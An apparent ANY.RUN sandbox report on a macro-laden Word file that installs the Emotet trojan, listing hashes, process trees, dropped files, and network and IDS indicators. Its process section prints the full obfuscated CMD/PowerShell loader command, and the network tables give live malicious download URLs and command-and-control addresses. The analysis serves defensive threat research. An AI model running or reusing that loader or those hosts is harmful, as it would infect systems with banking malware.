analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

A9059.doc

Full analysis: https://app.any.run/tasks/22ea1f20-afea-47db-a4ac-a91b9c31bc1b
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 08, 2018, 20:02:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Aubrey-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 8 03:58:00 2018, Last Saved Time/Date: Thu Nov 8 03:58:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

BFAE0EA9B840FF6FA4755A3C61B5664F

SHA1:

5AA97710F6E3C0686464DF8E6CA9B5737F8B212C

SHA256:

C81562BF33C1E35BEAD2B9DB4F0825E866F0343735182B96AE4A7A3DD51CF291

SSDEEP:

768:L9EVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o92FgeZCrrjIS:L9Eocn1kp59gxBK85fBt+a9pj

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3724)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3724)
    • Application was dropped or rewritten from another process

      • lpiograd.exe (PID: 3004)
      • 232.exe (PID: 3500)
      • 232.exe (PID: 2616)
      • lpiograd.exe (PID: 3252)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2976)
    • Emotet process was detected

      • lpiograd.exe (PID: 3004)
    • Changes the autorun value in the registry

      • lpiograd.exe (PID: 3252)
    • EMOTET was detected

      • lpiograd.exe (PID: 3252)
    • Connects to CnC server

      • lpiograd.exe (PID: 3252)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • CMD.exe (PID: 2776)
    • Creates files in the user directory

      • powershell.exe (PID: 2976)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2976)
      • 232.exe (PID: 3500)
    • Starts itself from another location

      • 232.exe (PID: 3500)
    • Connects to SMTP port

      • lpiograd.exe (PID: 3252)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3724)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3724)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:08 03:58:00
CreateDate: 2018:11:08 03:58:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Aubrey-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
7
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe 232.exe no specs 232.exe #EMOTET lpiograd.exe no specs #EMOTET lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
3724"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\A9059.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2776CMD C:\wIndowS\sySTem32\CMD.ExE /C "SeT FYB=^& ((Gv '*mDr*').nAme[3,11,2]-joIN'') ( NeW-oBJecT io.StrEAMReAder((NeW-oBJecT SysTEm.iO.CoMprESSiOn.DEfLAtestrEAM( [sySTeM.IO.mEMORysTrEAm] [SysTEm.conveRt]::FrOMBASE64STrinG( 'TZBda8IwGIX/Si8CUZwpc4OhoSDq5vxAhLk5YTdJ+jbNTBPXxsYi/vdV3cDb8xweDgf9iE1kwLct/wbhggU4sgY+1AqMo2j2MY5w6tyuF4bcHmwilZQaCiJsFq6Kp+1g3d3I/l9DsJxbwysHFy4XJSzL4b644aqQ7Aq9y6v1/B9574l03uY6ZoLFkFXEA08Vv6qmw/dDOug839ZZZS2HeC+YU9Yw7fJ94YgyYf44SzYuuZ9+YvK208o1cB83KcpWyyAKcOehgymyk3mEwJQ9B9muhb9w68xbmMABME1sDkykDTR+HQXKBOcjmsd68RHVh5GR9UZbFr8oDZfOXXAWNunElHYL7UktvSSU154tPdUbRXo8nX4B') , [IO.comPResSiOn.COmpRessionmOde]::dECOmpReSs ) ) ,[SYsTEm.tEXT.ENCoDiNG]::AScII)).reAdTOeNd() && POweRsheLL sEt-ITEM ( 'va' + 'Riab'+'l' + 'e:l9eS' + '2' ) ( [TYPe](\"{1}{2}{0}\" -F'ronMent','EN','vI' ) ) ; ( (Gci ( 'Va' + 'RiAb'+'l' + 'e:L9ES' + '2') ).VALUE::(\"{2}{0}{1}{4}{3}\" -f 'ETENV','IRoNmENtV','G','ABLE','ARI' ).Invoke('fYB',(\"{0}{2}{1}\"-f 'pRo','s','cEs' ) )) ^| . ( ( ^& ('Gv') ( \"{0}{1}\"-f '*MD','r*' )).\"N`AMe\"[3,11,2]-jOiN'' )" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2976POweRsheLL sEt-ITEM ( 'va' + 'Riab'+'l' + 'e:l9eS' + '2' ) ( [TYPe](\"{1}{2}{0}\" -F'ronMent','EN','vI' ) ) ; ( (Gci ( 'Va' + 'RiAb'+'l' + 'e:L9ES' + '2') ).VALUE::(\"{2}{0}{1}{4}{3}\" -f 'ETENV','IRoNmENtV','G','ABLE','ARI' ).Invoke('fYB',(\"{0}{2}{1}\"-f 'pRo','s','cEs' ) )) | . ( ( & ('Gv') ( \"{0}{1}\"-f '*MD','r*' )).\"N`AMe\"[3,11,2]-jOiN'' )C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2616"C:\Users\admin\AppData\Local\Temp\232.exe" C:\Users\admin\AppData\Local\Temp\232.exepowershell.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Exit code:
0
Version:
1, 4, 2, 50
3500"C:\Users\admin\AppData\Local\Temp\232.exe"C:\Users\admin\AppData\Local\Temp\232.exe
232.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Exit code:
0
Version:
1, 4, 2, 50
3004"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
232.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Exit code:
0
Version:
1, 4, 2, 50
3252"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Version:
1, 4, 2, 50
Total events
1 790
Read events
1 364
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3724WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3042.tmp.cvr
MD5:
SHA256:
2976powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2EW05CL1PEEZC3Y4XTPP.temp
MD5:
SHA256:
3724WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFE18EFCB1BFBDC2C1.TMP
MD5:
SHA256:
3724WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5DCD0F25-EC28-4DAB-8A06-E7F651CE6274}.tmp
MD5:
SHA256:
3724WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{07D0BFC1-1308-4716-B33D-AAA3A76434ED}.tmp
MD5:
SHA256:
3724WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$A9059.docpgc
MD5:7EFC130A21DED113B9DD138A70C293E5
SHA256:9AB206D6CF0D6788BE0BE2D9AACE5DD208565B78E836FE77C7EE73C7C322FB03
2976powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
2976powershell.exeC:\Users\admin\AppData\Local\Temp\232.exeexecutable
MD5:1B11AA2A09F5D922CC8DEFEF05C69FE9
SHA256:616084AF06E1D2AF84097716846A1CEBAC58FBD3A2F078EBECC0843E5E039BB6
2976powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF183870.TMPbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
3500232.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:1B11AA2A09F5D922CC8DEFEF05C69FE9
SHA256:616084AF06E1D2AF84097716846A1CEBAC58FBD3A2F078EBECC0843E5E039BB6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
61
DNS requests
53
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2976
powershell.exe
GET
301
50.62.102.1:80
http://boxofgiggles.com/Ts7kBW9Yg
US
html
308 b
malicious
2976
powershell.exe
GET
200
50.62.102.1:80
http://boxofgiggles.com/Ts7kBW9Yg/
US
executable
148 Kb
malicious
3252
lpiograd.exe
GET
200
187.163.174.149:8080
http://187.163.174.149:8080/
MX
binary
148 b
malicious
3252
lpiograd.exe
GET
200
47.157.181.81:443
http://47.157.181.81:443/
US
binary
51.6 Kb
malicious
3252
lpiograd.exe
GET
200
47.157.181.81:443
http://47.157.181.81:443/whoami.php
US
text
13 b
malicious
3252
lpiograd.exe
GET
200
187.163.174.149:8080
http://187.163.174.149:8080/
MX
binary
751 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3252
lpiograd.exe
187.163.174.149:8080
Axtel, S.A.B. de C.V.
MX
malicious
2976
powershell.exe
50.62.102.1:80
boxofgiggles.com
GoDaddy.com, LLC
US
malicious
3252
lpiograd.exe
47.157.181.81:443
Frontier Communications of America, Inc.
US
malicious
3252
lpiograd.exe
52.97.129.242:465
outlook.office365.com
Microsoft Corporation
US
whitelisted
3252
lpiograd.exe
188.125.73.26:25
smtp.mail.yahoo.com
CH
unknown
3252
lpiograd.exe
85.13.152.160:465
mail.uroscharf.de
Neue Medien Muennich GmbH
DE
unknown
3252
lpiograd.exe
200.45.71.53:587
mail.electromisiones.com.ar
Telecom Argentina S.A.
AR
unknown
3252
lpiograd.exe
200.58.120.27:25
mail.servicioledesma.com.ar
Dattatec.com
AR
unknown
3252
lpiograd.exe
201.148.105.67:587
mail.firstclean.cl
Gtd Internet S.A.
CL
unknown
3252
lpiograd.exe
184.106.54.10:25
secure.emailsrvr.com
Rackspace Ltd.
US
malicious

DNS requests

Domain
IP
Reputation
boxofgiggles.com
  • 50.62.102.1
malicious
mail.electromisiones.com.ar
  • 200.45.71.53
unknown
smtp.mail.yahoo.com
  • 188.125.73.26
shared
mail.uroscharf.de
  • 85.13.152.160
unknown
mail.1und1.de
unknown
smtp.claro-cloud.net.co
  • 74.202.142.99
unknown
secure.emailsrvr.com
  • 184.106.54.10
shared
smtp.chromosrl.com.ar
  • 190.210.9.72
unknown
mail.firstclean.cl
  • 201.148.105.67
unknown
p3plcpnl0423.prod.phx3.secureserver.net
  • 50.62.161.190
unknown

Threats

PID
Process
Class
Message
2976
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
2976
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2976
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2976
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3252
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3252
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3252
lpiograd.exe
Generic Protocol Command Decode
SURICATA Applayer Detect protocol only one direction
3252
lpiograd.exe
Generic Protocol Command Decode
SURICATA Applayer Detect protocol only one direction
3252
lpiograd.exe
Generic Protocol Command Decode
SURICATA Applayer Detect protocol only one direction
3252
lpiograd.exe
Generic Protocol Command Decode
SURICATA Applayer Detect protocol only one direction
3 ETPRO signatures available at the full report
No debug info